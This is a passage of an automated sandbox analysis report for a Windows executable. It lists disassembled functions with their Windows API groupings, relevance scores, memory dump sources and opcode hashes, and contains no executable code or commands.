                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID:
                                                                                • API String ID: 1473721057-0
                                                                                • Opcode ID: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                                • Instruction ID: f556a62e59c267119a6a2111348e338e7386b3f44486855483f69a97ef20d3bd
                                                                                • Opcode Fuzzy Hash: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                                • Instruction Fuzzy Hash: 56D17A76B04B819AEB60EB70D4801ECB3B5FB54798B800436DE0D57B69DF38E429D390
                                                                                Function 00007FF79F90EB34 Relevance: 6.2, APIs: 4, Instructions: 156processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 2000298826-0
                                                                                • Opcode ID: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                                • Instruction ID: 64a6fc27f5c76433a5f0bcd7fcc0ce6cc7917e59d40e054e70722af2b99e8adb
                                                                                • Opcode Fuzzy Hash: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                                • Instruction Fuzzy Hash: A7716C36A18B8186EB50FB21E4447EEA3B0FB88B98F844132EA4D47B69DF7CD545C740
                                                                                Function 00007FF79F91D88C Relevance: 6.1, APIs: 4, Instructions: 134windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientMessageMoveRectScreenSend
                                                                                • String ID:
                                                                                • API String ID: 1249313431-0
                                                                                • Opcode ID: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                                • Instruction ID: b6aae5d8b180acc2f24957ae5575262e81efdcdb91d178cd66ffb2fb4e4f47cf
                                                                                • Opcode Fuzzy Hash: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                                • Instruction Fuzzy Hash: 3A519132B05A828EE760DF35D4806F97761FB44BA8F914232DA2D93798CF39E845C310
                                                                                Function 00007FF79F8EBAB8 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 2267087916-0
                                                                                • Opcode ID: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                                • Instruction ID: 42198f170c2c2efef161ee8dd779bf307a40eaabc0d92103e1a578401bd2e808
                                                                                • Opcode Fuzzy Hash: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                                • Instruction Fuzzy Hash: 7F51A322B09A9185EFA0AF71D840AECB3B9BB44BA4F944135DE0D57798DF3CD952D310
                                                                                Function 00007FF79F8F5DA4 Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 3321077145-0
                                                                                • Opcode ID: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                                • Instruction ID: fbe938c2d2936c93e263897256ae316a4216c625818ebb544f43d1423488d7c8
                                                                                • Opcode Fuzzy Hash: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                                • Instruction Fuzzy Hash: 1D41F866A04B8681DB64EF33D4915ADB360FB88FD0B889432DF4E4B766CE3CE4919350
                                                                                Function 00007FF79F91F014 Relevance: 6.1, APIs: 4, Instructions: 107windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                • String ID:
                                                                                • API String ID: 1352109105-0
                                                                                • Opcode ID: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                                • Instruction ID: f641adde9c5d32af377175f83a945e7c91b00244ae26fd66879a212eb0a94eba
                                                                                • Opcode Fuzzy Hash: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                                • Instruction Fuzzy Hash: 07418432B14F8A85EB30EF25D8942B9B3A0BB85BA8F954135CA1DC7368DF38F4458310
                                                                                Function 00007FF79F91AA04 Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                • String ID:
                                                                                • API String ID: 3076010158-0
                                                                                • Opcode ID: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                                                • Instruction ID: f8780706fc2ab28b080335f087fe7cf04952181058e1892c3877c41aa79155ac
                                                                                • Opcode Fuzzy Hash: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                                                • Instruction Fuzzy Hash: 92414726B04A858AEB60DF66D8402ED67A1FB44BB4F954036CE0D97768CF38E895C750
                                                                                Function 00007FF79F8AC72C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                • String ID:
                                                                                • API String ID: 4141327611-0
                                                                                • Opcode ID: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                                • Instruction ID: dfdb28a8aeb87aa66cfaa8d2e96c2016fb786e90c9bc283653adab67611fdfa3
                                                                                • Opcode Fuzzy Hash: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                                • Instruction Fuzzy Hash: EE41A532A0E7C246FBF1AB359048BF9E294EF42B90F944130DA5947AD9DF2CD8519B20
                                                                                Function 00007FF79F8E8B38 Relevance: 6.1, APIs: 4, Instructions: 96keyboardwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                                • Instruction ID: 333e81d5084f38dc05c8ef81a8dd2c5208269a20b5dce6082ca74876737ee2c9
                                                                                • Opcode Fuzzy Hash: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                                • Instruction Fuzzy Hash: 784108A1A4D6C241F7B0BB35B410FFDA6A0EB45B94F940531DA9A13694CF3CD4B6A720
                                                                                Function 00007FF79F8E8CAC Relevance: 6.1, APIs: 4, Instructions: 89keyboardwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                                • Instruction ID: f0af04f634a2db725d19b1108eeff0538e1134e9a664043071d6e5cfc11df30b
                                                                                • Opcode Fuzzy Hash: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                                • Instruction Fuzzy Hash: B031D522B0C6C146E7B0BB35A400BFDABA0EB54BA4F950231DA9903795CF3CD576E710
                                                                                Function 00007FF79F8FD7DC Relevance: 6.1, APIs: 4, Instructions: 82networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                • String ID:
                                                                                • API String ID: 1463438336-0
                                                                                • Opcode ID: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                                • Instruction ID: 62a2a31af55f6d4129914cb63916bc39b92af1e9aab20000ceba91f50f62ab98
                                                                                • Opcode Fuzzy Hash: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                                • Instruction Fuzzy Hash: E031C532B2878286E774EB26E451BB9A350FB59B94F440535DE4D07F48DF3CD0649B90
                                                                                Function 00007FF79F8B3D98 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF79F8AA27B,?,?,?,00007FF79F8AA236), ref: 00007FF79F8B3DB1
                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF79F8AA27B,?,?,?,00007FF79F8AA236), ref: 00007FF79F8B3E13
                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF79F8AA27B,?,?,?,00007FF79F8AA236), ref: 00007FF79F8B3E4D
                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF79F8AA27B,?,?,?,00007FF79F8AA236), ref: 00007FF79F8B3E77
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                • String ID:
                                                                                • API String ID: 1557788787-0
                                                                                • Opcode ID: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                                • Instruction ID: ad456f6f2d91954ff75d53e5a6ea8c6c8a79714991eb85705fe537b44f7f2253
                                                                                • Opcode Fuzzy Hash: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                                • Instruction Fuzzy Hash: 0621B421B187D181E670AF2164404A9F6A4FB44FE0B884136DE8E67B98DF3CE4629310
                                                                                Function 00007FF79F91F8A8 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long
                                                                                • String ID:
                                                                                • API String ID: 847901565-0
                                                                                • Opcode ID: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                                • Instruction ID: 08d9abfe1cf46410da6a54e2d8dcd4c35374d763efdfcd23939d3b503e3cfc2f
                                                                                • Opcode Fuzzy Hash: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                                • Instruction Fuzzy Hash: 21218F21A18B8589EA60AB3598942B9A750BF85BB4F954331DA6D877ECCF3CE445C310
                                                                                Function 00007FF79F92108C Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                • String ID:
                                                                                • API String ID: 2864067406-0
                                                                                • Opcode ID: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                                • Instruction ID: 6bf9928f15413e68d88ed28c0cc5e14ec08daae19fa8c847b4c179036e7bf391
                                                                                • Opcode Fuzzy Hash: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                                • Instruction Fuzzy Hash: 88316425A08A8581EB70EB25E8953F9E360FB84FA4F954231DA4D87B6DCF3CD495C710
                                                                                Function 00007FF79F8E50E4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                • String ID: cdecl
                                                                                • API String ID: 4031866154-3896280584
                                                                                • Opcode ID: 9543eb87236cbe86fa524af2d72e3452b2187adb33a089d16778c3ede46c2dfa
                                                                                • Instruction ID: 87f82fc0bbecb670ce8482f1bd785f892485f52c71ea6ce2dda48c1625e832c7
                                                                                • Opcode Fuzzy Hash: 9543eb87236cbe86fa524af2d72e3452b2187adb33a089d16778c3ede46c2dfa
                                                                                • Instruction Fuzzy Hash: 6621B16160438285EA74BF2298546B8B361EF48F94B894134EB5E8B398DF3CE460C314
                                                                                Function 00007FF79F8DD6A0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                                • String ID:
                                                                                • API String ID: 837644225-0
                                                                                • Opcode ID: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                                • Instruction ID: 361aafa858128e1611eeef018076702725a06e9a004c09767a6be68b35c34620
                                                                                • Opcode Fuzzy Hash: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                                • Instruction Fuzzy Hash: 7421BF33A14A8186EB64EF71E804BA8B3A5FF44B91F85413ACA0D47748DF3CE855C710
                                                                                Function 00007FF79F87932C Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                • String ID:
                                                                                • API String ID: 3970641297-0
                                                                                • Opcode ID: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                                • Instruction ID: 9d5d14c2f5a254b975de86d8a7ff7a7b219ee94d880ad52ca1611838de2329be
                                                                                • Opcode Fuzzy Hash: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                                • Instruction Fuzzy Hash: F1214172608BC58AE7B49B25E8447EAB7A1FB88790F940135DA8D47B58DF7CD494CB00
                                                                                Function 00007FF79F8A2FB8 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
